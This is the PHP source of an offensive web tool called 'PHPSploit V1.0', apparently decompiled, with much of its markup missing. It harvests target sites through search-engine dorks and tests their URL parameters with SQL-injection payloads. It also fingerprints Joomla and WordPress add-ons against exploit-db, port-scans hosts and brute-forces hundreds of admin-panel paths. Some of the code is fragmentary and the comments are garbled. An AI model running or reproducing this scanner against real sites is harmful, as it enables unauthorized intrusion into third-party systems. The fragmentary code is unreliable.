PHPSploit V1.0

/* Decoded by unphp.net */ ?> Not FoundDownload"; }else{ echo"Found ..!<--"; } } /**************************************************************/ function get_components($site1){ // ÏÇáÉ áÇÓÊÎÑÇÌ ÇáÇÖÇÝÇÊ ãä ÓæÑÓ ÇáÕÝÍÉ ÌæãáÇ $source = @file_get_contents($site1); preg_match_all('{option,(.*?)/}i',$source,$f); preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2); preg_match_all('{/components/(.*?)/}i',$source,$f3); $arz=array_merge($f2[1],$f[1],$f3[1]); $coms=array(); if(count($arz)==0){ echo "[~] Nothing Found ..! , Maybe there is some error site or option ... check it .";} foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $comm){ echo "$comm"; ask_exploit_db($comm); } } /**************************************************************/ function get_plugins($site1){ // ÏÇáÉ áÇÓÊÎÑÇÌ ÇáÇÖÇÝÇÊ ãä ÓæÑÓ ÇáÕÝÍÉ æíÑÏ ÈÑíÓ $source = @file_get_contents($site1); preg_match_all("#/plugins/(.*?)/#i", $source, $f); $plugins=array_unique($f[1]); if(count($plugins)==0){ echo "[~] Nothing Found ..! , Maybe there is some error site or option ... check it .";} foreach($plugins as $plugin){ echo "$plugin"; ask_exploit_db($plugin); } } /**************************************************************/ function t_header($site1){ // ÈÏÇíÉ ÇáÌÏæá echo''; echo' '; } //--------------fin gripp // Party vulnerability $site1=strip_tags(trim($_GET['webvuln'])); t_header($site1); $url_to_change = $site1; $www = 'www'; $position = strpos($url_to_change, $www); if ($position === false) { $site1 = str_replace("".$site1."", "www.".$site1."", $site1); } else { echo ''; } if($_GET['what'] == 'joomla') { echo get_components("http://".$site1); } elseif($_GET['what'] == 'wordpress') { echo get_plugins("http://".$site1); } } elseif($_GET['dork']) { //////////////// ICI POUR LES SITE SIMPLE SQLi seulement pour l'instant ?> =2) && (is_numeric($vars[1]))){ $final = str_replace($query,$query."%27",$url_); //echo $final; $content = fetch($final); $url_1 = file_get_contents($url_); $url_2 = file_get_contents($final); if(preg_match("/sql syntax|sql error|right syntax to use near|Warning|SQL|syntax error converting|unclosed quotation|is not a valid MySQL result/i",$content) OR ($url_1 !== $url_2)){ return $vars[0]; } } } } return ""; // gagal son } function sqlheavycheck($url_){ // clean url $url_ = "http://".trim(str_ireplace("http://","",$url_)); $url_ = str_ireplace("&","&",$url_); // check if url contains querystring $pos = stripos($url_,"?"); if($pos !== false){ $url = substr($url_,0,$pos); $que = substr($url_,$pos+1); $querys = explode("&",$que); foreach($querys as $query){ $vars = explode("=",$query); //echo $query; // check if parameter has a numeric value if((count($vars)>=2) && (is_numeric($vars[1]))){ // and 1=(select 1) $acak = rand(1111,9999); $final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%20".$acak."%29--",$url_); $contrue = fetch($final); //echo "final1 : ".$final."
"; // and 1=(select 0) $acak = rand(1111,9999); $final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%200%29--",$url_); //echo "final2 : ".$final."
"; $confalse = fetch($final); $numtrue = strlen(strip_tags($contrue)); $numfalse = strlen(strip_tags($confalse)); $selisih = $numtrue - $numfalse; if($selisih >= 30){ return $vars[0]; } else{ //' and 1=(select 1) and '1'='1 $acak = rand(1111,9999); $final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%20".$acak."%29%20AND%20%271%27=%271",$url_); $contrue = fetch($final); //echo "final1 : ".$final."
"; //' and 1=(select 0) and '1'='1 $acak = rand(1111,9999); $final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%200%29%20AND%20%271%27=%271",$url_); //echo "final2 : ".$final."
"; $confalse = fetch($final); $numtrue = strlen(strip_tags($contrue)); $numfalse = strlen(strip_tags($confalse)); $selisih = $numtrue - $numfalse; if($selisih >= 30){ return $vars[0]; } } } } } return ""; // gagal son... } // debugging tools if(isset($_GET['check'])&&($_GET['check']!="")){ $url = $_GET['check']; echo $url." ".sqlcheck($url); die(); } if(isset($_GET['heavycheck'])&&($_GET['heavycheck']!="")){ $url = $_GET['heavycheck']; echo $url." ".sqlheavycheck($url); die(); } // debugging tools end if(isset($_GET['dork'])&&($_GET['dork']!="")){ $gnum = 10; // jumlah hasil pencarian perhalaman $setype = "google"; // default cari pakek g00gle if(isset($_GET['setype'])) $setype = strtolower(trim($_GET['setype'])); if(isset($_GET['page'])){ $gpage = (int) $_GET['page']; if($gpage < 1) $gpage = 1; } else $gpage = 1; $gpage = ($gpage - 1) * $gnum; if($gpage > ($gpage * $gnum)){ echo "_finish_|max only ".$gpage." results"; die(); } $dork = stripslashes($_GET['dork']); $dorkg = "site:".urldecode($dork)." filetype:php"; $dorkb = urldecode("site:".$dork."+php"); $dorkb = str_replace(" ","+",$dorkb); if($setype == "google"){ for($i=1; $i<3; $i++) { $gsearch = fetch("http://www.google.com/search?hl=fr&q=" . urlencode($dorkg) . "&start=$gpage"); $raws = explode("

",$gsearch); if((trim($gsearch) == "") || (count($raws) <= 1) || !(preg_match('/

[X] ".$setype.""; die(); } } } elseif($setype == "bing"){ for($i=1; $i<3; $i++) { $dork = preg_replace("/^[^:]:(.)/i","",$dorkb); $gsearch = fetch("http://www.bing.com/search?q=".$dorkb."&filt=all&first=".$gpage."&FORM=PERE3"); $raws = explode("
",$gsearch); if((trim($gsearch) == "") || (!preg_match("/class=\"sb_pagN\"/i",$gsearch)) || (count($raws) <= 1)){ echo "[X] ".$setype.""; die(); } } } else{ echo "Search engine not supported"; die(); } foreach($raws as $korban){ if(strlen($korban) >= 9 && (substr($korban,0,9)=="".$url." @ ".$vulnvar."
"; else $laporan = "".$url."
"; echo $laporan; } else{ $vulnvar = sqlcheck($url); if($vulnvar != "") $laporan = "".$url." @ ".$vulnvar."
"; else $laporan = "".$url."
"; echo $laporan; } } } } die(); // mas kamu koq looyo... } } else { $list['front'] ="admin team adm admincp admcp cp modcp moderatorcp adminare admins cpanel controlpanel"; $list['end'] = "admin1.php team admin1.html admin2.php admin2.html yonetim.php yonetim.html yonetici.php yonetici.html ccms/ upload.php ccms/login.php ccms/index.php maintenance/ webmaster/ adm/ configuration/ configure/ websvn/ admin/ admin/account.php admin/account.html admin/index.php admin/index.html admin/login.php admin/login.html admin/home.php admin/controlpanel.html admin/controlpanel.php admin.php admin.html admin/cp.php admin/cp.html cp.php cp.html administrator/ administrator/index.html administrator/index.php administrator/login.html administrator/login.php administrator/account.html administrator/account.php administrator.php administrator.html login.php login.html modelsearch/login.php moderator.php moderator.html moderator/login.php moderator/login.html moderator/admin.php moderator/admin.html moderator/ account.php account.html controlpanel/ controlpanel.php controlpanel.html admincontrol.php admincontrol.html adminpanel.php adminpanel.html admin1.asp admin2.asp yonetim.asp yonetici.asp admin/account.asp admin/index.asp admin/login.asp admin/home.asp admin/controlpanel.asp admin.asp admin/cp.asp cp.asp administrator/index.asp administrator/login.asp administrator/account.asp administrator.asp login.asp modelsearch/login.asp moderator.asp moderator/login.asp moderator/admin.asp account.asp controlpanel.asp admincontrol.asp adminpanel.asp fileadmin/ fileadmin.php fileadmin.asp fileadmin.html administration/ administration.php administration.html sysadmin.php sysadmin.html phpMyAdmin/ phpmyadmin/ PMA/ admin/ dbadmin/ mysql/ myadmin/ phpmyadmin2/ phpMyAdmin2/ phpMyAdmin-2/ php-my-admin/ weMeanYouNoHarm/ V20xRmRRPT0K/ admin/pma/ admin/phpmyadmin/ db/ myadmin/ mysql/ mysqladmin/ typo3/phpmyadmin/ phpadmin/ phpmyadmin1/ web/phpMyAdmin/ xampp/phpmyadmin/ web/ php-my-admin/ websql/ phpMyAdmin-2/ php-my-admin/ phpMyAdmin-2.8.2.1/ phpMyAdmin-2.8.2.2/ phpMyAdmin-2.8.2.3/ phpMyAdmin-2.8.2.4/ phpMyAdmin-2.10.0.0/ phpMyAdmin-2.10.0.1/ phpMyAdmin-2.10.0.2/ phpMyAdmin-2.10.1.0/ phpMyAdmin-2.10.2.0/ phpMyAdmin-2.11.0.0/ phpMyAdmin-2.11.1.0/ phpMyAdmin-2.11.1.1/ phpMyAdmin-2.11.1.2/ phpMyAdmin-2.11.2.0/ phpMyAdmin-2.11.2.1/ phpMyAdmin-2.11.2.2/ phpMyAdmin-2.11.3.0/ phpMyAdmin-2.11.4.0/ phpMyAdmin-2.11.5.0/ phpMyAdmin-2.11.5.1/ phpMyAdmin-2.11.5.2/ phpMyAdmin-2.11.6.0/ phpMyAdmin-2.11.7.0/ phpMyAdmin-2.11.7.1/ phpMyAdmin-2.11.8.0/ phpMyAdmin-2.11.9.0/ phpMyAdmin-2.11.9.1/ phpMyAdmin-2.11.9.2/ phpMyAdmin-2.11.9.3/ phpMyAdmin-2.11.9.4/ phpMyAdmin-3.0.0.0/ phpMyAdmin-3.0.1.0/ phpMyAdmin-3.0.1.1/ phpMyAdmin-3.0.2.0/ phpMyAdmin-3.1.0.0/ phpMyAdmin-3.1.1.0/ phpMyAdmin-3.1.2.0/ phpMyAdmin-3.1.3.0/ phpMyAdmin-2.9.0-rc1/ phpMyAdmin-2.9.0/ phpMyAdmin-2.9.0.1/ phpMyAdmin-2.9.0.2/ phpMyAdmin-2.9.1/ phpMyAdmin-2.9.2/ phpMyAdmin-3.4.3.1-all-languages/ phpMyAdmin-3.4.3.1-english/ phpMyAdmin-3.4.3.1/ sqlmanager/ mysqlmanager/ p/m/a/ PMA2005/ pma2005/ pma2006/ pma2007/ pma2008/ pma2009/ phpmanager/ php-myadmin/ phpmy-admin/ webadmin/ sqlweb/ websql/ webdb/ mysqladmin/ mysql-admin/ databaseadmin/ admm/ admn/ w00tw00t.at.blackhats.romanian.anti-sec:)/ phpMyAdmin/scripts/setup.php/ phpmyadmin/scripts/setup.php/ pma/scripts/setup.php/ myadmin/scripts/setup.php/ MyAdmin/scripts/setup.php/ phpmyadmin/scripts/setup.php/ phpMyAdmin/scripts/setup.php/ phpMyAdmin-2.2.3/ phpMyAdmin-2.2.6/ phpMyAdmin-2.5.1/ phpMyAdmin-2.5.4/ phpMyAdmin-2.5.5-rc1/ phpMyAdmin-2.5.5-rc2/ phpMyAdmin-2.5.5/ phpMyAdmin-2.5.5-pl1/ phpMyAdmin-2.5.6-rc1/ phpMyAdmin-2.5.6-rc2/ phpMyAdmin-2.5.6/ phpMyAdmin-2.5.7/ phpMyAdmin-2.5.7-pl1/ phpMyAdmin-2.6.0-alpha/ phpMyAdmin-2.6.0-alpha2/ phpMyAdmin-2.6.0-beta1/ phpMyAdmin-2.6.0-beta2/ phpMyAdmin-2.6.0-rc1/ phpMyAdmin-2.6.0-rc2/ phpMyAdmin-2.6.0-rc3/ phpMyAdmin-2.6.0/ phpMyAdmin-2.6.0-pl1/ phpMyAdmin-2.6.0-pl2/ phpMyAdmin-2.6.0-pl3/ phpMyAdmin-2.6.1-rc1/ phpMyAdmin-2.6.1-rc2/ phpMyAdmin-2.6.1/ phpMyAdmin-2.6.1-pl1/ phpMyAdmin-2.6.1-pl2/ phpMyAdmin-2.6.1-pl3/ phpMyAdmin-2.6.2-rc1/ phpMyAdmin-2.6.2-beta1/ phpMyAdmin-2.6.2-rc1/ phpMyAdmin-2.6.2/ phpMyAdmin-2.6.2-pl1/ phpMyAdmin-2.6.3/ phpMyAdmin-2.6.3-rc1/ phpMyAdmin-2.6.3/ phpMyAdmin-2.6.3-pl1/ phpMyAdmin-2.6.4-rc1/ phpMyAdmin-2.6.4-pl1/ phpMyAdmin-2.6.4-pl2/ phpMyAdmin-2.6.4-pl3/ phpMyAdmin-2.6.4-pl4/ phpMyAdmin-2.6.4/ phpMyAdmin-2.7.0-beta1/ phpMyAdmin-2.7.0-rc1/ phpMyAdmin-2.7.0-pl1/ phpMyAdmin-2.7.0-pl2/ phpMyAdmin-2.7.0/ phpMyAdmin-2.8.0-beta1/ phpMyAdmin-2.8.0-rc1/ phpMyAdmin-2.8.0-rc2/ phpMyAdmin-2.8.0/ phpMyAdmin-2.8.0.1/ phpMyAdmin-2.8.0.2/ phpMyAdmin-2.8.0.3/ phpMyAdmin-2.8.0.4/ phpMyAdmin-2.8.1-rc1/ phpMyAdmin-2.8.1/ phpMyAdmin-2.8.2/ sqlmanager/ mysqlmanager/ p/m/a/ PMA2005/ pma2005/ phpmanager/ php-myadmin/ phpmy-admin/ webadmin/ sqlweb/ websql/ webdb/ mysqladmin/ mysql-admin/ myadmin/ sysadmin.asp sysadmin/ ur-admin.asp ur-admin.php ur-admin.html ur-admin/ Server.php Server.html Server.asp Server/ wp-admin/ administr8.php administr8.html administr8/ administr8.asp webadmin/ webadmin.php webadmin.asp webadmin.html administratie/ admins/ admins.php admins.asp admins.html administrivia/ Database_Administration/ WebAdmin/ useradmin/ sysadmins/ admin1/ system-administration/ administrators/ pgadmin/ directadmin/ staradmin/ ServerAdministrator/ SysAdmin/ administer/ LiveUser_Admin/ sys-admin/ typo3/ panel/ cpanel/ cPanel/ cpanel_file/ platz_login/ rcLogin/ blogindex/ formslogin/ autologin/ support_login/ meta_login/ manuallogin/ simpleLogin/ loginflat/ utility_login/ showlogin/ memlogin/ members/ login-redirect/ sub-login/ wp-login/ login1/ dir-login/ login_db/ xlogin/ smblogin/ customer_login/ UserLogin/ login-us/ acct_login/ admin_area/ bigadmin/ project-admins/ phppgadmin/ pureadmin/ sql-admin/ radmind/ openvpnadmin/ wizmysqladmin/ vadmind/ ezsqliteadmin/ hpwebjetadmin/ newsadmin/ adminpro/ Lotus_Domino_Admin/ bbadmin/ vmailadmin/ Indy_admin/ ccp14admin/ irc-macadmin/ banneradmin/ sshadmin/ phpldapadmin/ macadmin/ administratoraccounts/ admin4_account/ admin4_colon/ radmind-1/ Super-Admin/ AdminTools/ cmsadmin/ SysAdmin2/ globes_admin/ cadmins/ phpSQLiteAdmin/ navSiteAdmin/ server_admin_small/ logo_sysadmin/ server/ database_administration/ power_user/ system_administration/ ss_vms_admin_sm/ adminarea/ bb-admin/ adminLogin/ panel-administracion/ instadmin/ memberadmin/ administratorlogin/ admin/admin.php admin_area/admin.php admin_area/login.php siteadmin/login.php siteadmin/index.php siteadmin/login.html admin/admin.html admin_area/index.php bb-admin/index.php bb-admin/login.php bb-admin/admin.php admin_area/login.html admin_area/index.html admincp/index.asp admincp/login.asp admincp/index.html webadmin/index.html webadmin/admin.html webadmin/login.html admin/admin_login.html admin_login.html panel-administracion/login.html nsw/admin/login.php webadmin/login.php admin/admin_login.php admin_login.php admin_area/admin.html pages/admin/admin-login.php admin/admin-login.php admin-login.php bb-admin/index.html bb-admin/login.html bb-admin/admin.html admin/home.html pages/admin/admin-login.html admin/admin-login.html admin-login.html admin/adminLogin.html adminLogin.html home.html rcjakar/admin/login.php adminarea/index.html adminarea/admin.html webadmin/index.php webadmin/admin.php user.html modelsearch/login.html adminarea/login.html panel-administracion/index.html panel-administracion/admin.html modelsearch/index.html modelsearch/admin.html admincontrol/login.html adm/index.html adm.html user.php panel-administracion/login.php wp-login.php adminLogin.php admin/adminLogin.php home.php adminarea/index.php adminarea/admin.php adminarea/login.php panel-administracion/index.php panel-administracion/admin.php modelsearch/index.php modelsearch/admin.php admincontrol/login.php adm/admloginuser.php admloginuser.php admin2/login.php admin2/index.php adm/index.php adm.php affiliate.php adm_auth.php memberadmin.php administratorlogin.php admin/admin.asp admin_area/admin.asp admin_area/login.asp admin_area/index.asp bb-admin/index.asp bb-admin/login.asp bb-admin/admin.asp pages/admin/admin-login.asp admin/admin-login.asp admin-login.asp user.asp webadmin/index.asp webadmin/admin.asp webadmin/login.asp admin/admin_login.asp admin_login.asp panel-administracion/login.asp adminLogin.asp admin/adminLogin.asp home.asp adminarea/index.asp adminarea/admin.asp adminarea/login.asp panel-administracion/index.asp panel-administracion/admin.asp modelsearch/index.asp modelsearch/admin.asp admincontrol/login.asp adm/admloginuser.asp admloginuser.asp admin2/login.asp admin2/index.asp adm/index.asp adm.asp affiliate.asp adm_auth.asp memberadmin.asp administratorlogin.asp siteadmin/login.asp siteadmin/index.asp ADMIN/ paneldecontrol/ login/ cms/ admon/ ADMON/ administrador/ ADMIN/login.php panelc/ ADMIN/login.html admin.php login.htm login.html login/ login.php adm/ admin/ admin/account.html admin/login.html admin/login.htm admin/home.php admin/controlpanel.html admin/controlpanel.htm admin/cp.php admin/adminLogin.html admin/adminLogin.htm admin/admin_login.php admin/controlpanel.php admin/admin-login.php admin-login.php admin/account.php admin/admin.php admin.htm admin.html adminitem/ adminitem.php adminitems/ adminitems.php administrator/ administrator/login.php administrator.php administration/ administration.php adminLogin/ adminlogin.php admin_area/admin.php admin_area/ admin_area/login.php manager/ manager.php letmein/ letmein.php superuser/ superuser.php access/ access.php sysadm/ sysadm.php superman/ supervisor/ panel.php control/ control.php member/ member.php members/ members.php user/ user.php cp/ uvpanel/ manage/ manage.php management/ management.php signin/ signin.php log-in/ log-in.php log_in/ log_in.php sign_in/ sign_in.php sign-in/ sign-in.php users/ users.php accounts/ accounts.php wp-login.php bb-admin/login.php bb-admin/admin.php bb-admin/admin.html administrator/account.php relogin.htm relogin.html check.php relogin.php processlogin.php checklogin.php checkuser.php checkadmin.php isadmin.php authenticate.php authentication.php auth.php authuser.php authadmin.php cp.php modelsearch/login.php moderator.php moderator/ controlpanel/ controlpanel.php admincontrol.php adminpanel.php fileadmin/ fileadmin.php sysadmin.php admin1.php admin1.html admin1.htm admin2.php admin2.html yonetim.php yonetim.html yonetici.php yonetici.html phpmyadmin/ myadmin/ ur-admin.php ur-admin/ Server.php Server/ wp-admin/ administr8.php administr8/ webadmin/ webadmin.php administratie/ admins/ admins.php administrivia/ Database_Administration/ useradmin/ sysadmins/ admin1/ system-administration/ administrators/ pgadmin/ directadmin/ staradmin/ ServerAdministrator/ SysAdmin/ administer/ LiveUser_Admin/ sys-admin/ typo3/ panel/ cpanel/ cpanel_file/ platz_login/ rcLogin/ blogindex/ formslogin/ autologin/ support_login/ meta_login/ manuallogin/ simpleLogin/ loginflat/ utility_login/ showlogin/ memlogin/ login-redirect/ sub-login/ wp-login/ login1/ dir-login/ login_db/ xlogin/ smblogin/ customer_login/ UserLogin/ login-us/ acct_login/ bigadmin/ project-admins/ phppgadmin/ pureadmin/ sql-admin/ radmind/ openvpnadmin/ wizmysqladmin/ vadmind/ ezsqliteadmin/ hpwebjetadmin/ newsadmin/ adminpro/ Lotus_Domino_Admin/ bbadmin/ vmailadmin/ Indy_admin/ ccp14admin/ irc-macadmin/ banneradmin/ sshadmin/ phpldapadmin/ macadmin/ administratoraccounts/ admin4_account/ admin4_colon/ radmind-1/ Super-Admin/ AdminTools/ cmsadmin/ SysAdmin2/ globes_admin/ cadmins/ phpSQLiteAdmin/ navSiteAdmin/ server_admin_small/ logo_sysadmin/ power_user/ system_administration/ ss_vms_admin_sm/ bb-admin/ panel-administracion/ instadmin/ memberadmin/ administratorlogin/ adm.php admin_login.php panel-administracion/login.php pages/admin/admin-login.php pages/admin/ acceso.php admincp/login.php admincp/ adminarea/ admincontrol/ affiliate.php adm_auth.php memberadmin.php administratorlogin.php modules/admin/ administrators.php siteadmin/ siteadmin.php adminsite/ kpanel/ vorod/ vorod.php vorud/ vorud.php adminpanel/ PSUser/ secure/ webmaster/ webmaster.php autologin.php userlogin.php admin_area.php cmsadmin.php security/ usr/ root/ secret/ admin/login.php admin/adminLogin.php moderator.php moderator.html moderator/login.php moderator/admin.php yonetici.php 0admin/ 0manager/ aadmin/ cgi-bin/login.php login1.php login_admin/ login_admin.php login_out/ login_out.php login_user.php loginerror/ loginok/ loginsave/ loginsuper/ loginsuper.php login.php logout/ logout.php secrets/ super1/ super1.php super_index.php super_login.php supermanager.php superman.php superuser.php supervise/ supervise/Login.php super.php"; function template() { echo ' PHPSploit V1.0 '; ?>

Site : '.$site1.'

Exploit-db

Exploit it !

WebSite Party

'; ?>

'; if($_POST['xploit_submit']) { echo '

'; echo ' Infos about website:
*******************/

Ports scanner:
*************/

'; // Port scanner $port = array("21", "23", "25", "80", "110", "139", "445", "1433", "1521", "1723", "3306", "3389", "5900", "8080"); $port_name = array("(FTP)", "(TELNET)", "(SMTP)", "(HTTP)", "(POP3)", "(NETBIOS-SSN)", "(MICROSOFT-DS)", "(MS-SQL-S)", "(NCUBE-LM)", "(PPTP)", "(MYSQL)", "(MS-WBT-SERVER)", "()", "(WEBCACHE)"); $site = $_POST['xploit_url']; $site = str_replace("http://", "", $site); $ip_target = gethostbyname("".$site.""); for($i=0;$i<12;$i++) { $fp = fsockopen($ip_target,$port[$i],$errno,$errstr,0.1); if($fp) { echo "". $port_name[$i] ." port " . $port[$i] . " OPEN on " . $ip_target . "
"; fclose($fp); } else { echo "". $port_name[$i] ." port " . $port[$i] . " CLOSED on " . $ip_target . "
"; } flush(); } //------------------------------------------- echo '

'; echo ' Found ones:
***********/
'; echo '

'; echo ' Websites on the server:
*********************/
'; if($_POST['xploit_submit']) { $dorkk = "ip:".$ip_target; $pageNum = 0; for($pageNum = 0; $pageNum < 10; $pageNum++) { $bing = file_get_contents("http://www.bing.com/search?q=".str_replace(" ","+",$dorkk)."&go=&filt=all&first=".$pageNum.""); if(!preg_match("/No results found for/",$bing)) { preg_match_all("/

/",$bing,$sites); if(count($sites[1])==0) {return false;} for($i=0 ; $i < count($sites[1]);$i++) { $site2 = str_replace(array("http://","https://","www."),"",$sites[1][$i]); $site2 = substr($site2,0,strpos($site2,"/",0));; if(!in_array($site2,$arrayy)) { //Search for JOOMLA & WORDPRESS $headers_joomla = @get_headers("http://".$site2."/administrator"); $headers_wordpress = @get_headers("http://".$site2."/wp-admin"); if(strpos($headers_joomla[0],'404') === false) { $joomla = "joomla"; $site3 = $site2." (JOOMLA) | TEST VULNERABILITY"; echo $site3. "
"; ?>

TEST VULNERABILITY"; echo $site3. "
"; ?>

TEST VULNERABILITY
"; $site4 = str_replace("www.", "", $site2); $site4 = str_replace("http://", "", $site2); ?>
">

">

";} } echo '

'; echo ' Admin page Finder:
******************/

'; } } function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) { if($br == 1) $msg .= "
"; echo ""; if($stop == 1) exit; @flush();@ob_flush(); } function showport($site, $port) { if($br == 1) $msg .= "
"; echo ""; if($stop == 1) exit; @flush();@ob_flush(); } function check($x, $front=0) { global $_POST,$site,$false; if($front == 0) $t = $site.$x; else $t = 'http://'.$x.'.'.$site.'/'; $headers = get_headers($t); if (!eregi('200', $headers[0])) return 0; $data = @file_get_contents($t); if($_POST['xploit_404string'] == "") if($data == $false) return 0; if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0; return 1; } // -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- template(); if(!isset($_POST['xploit_url'])) die; if($_POST['xploit_url'] == '') die; $site = $_POST['xploit_url']; $site = str_replace("http://", "", $site); $site = "http://".$site; if ($site[strlen($site)-1] != "/") $site .= "/"; if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html"); $list['end'] = str_replace(" ", "", $list['end']); $list['front'] = str_replace(" ", "", $list['front']); $pathes = explode(" ", $list['end']); $frontpathes = explode(" ", $list['front']); show(count($pathes)+count($frontpathes), 1, 0, 'total', 1); $verificate = 0; foreach($pathes as $path) { show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0); $verificate++; show($verificate, 0, 0, 'verified', 1); if(check($path) == 0) show('not found', 1, 0, 'logbox', 0); else{ show('found', 1, 0, 'logbox', 0); show(''.$site.$path.'', 1, 0, 'rightcol', 0); } } preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1]; if(substr($site, 0, 3) == "www") $site = substr($site, 4); foreach($frontpathes as $frontpath) { show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0); $verificate++; show($verificate, 0, 0, 'verified', 1); if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0); else{ show('found', 1, 0, 'logbox', 0); show(''.$frontpath.'.'.$site.'', 1, 0, 'rightcol', 0); } } } ?>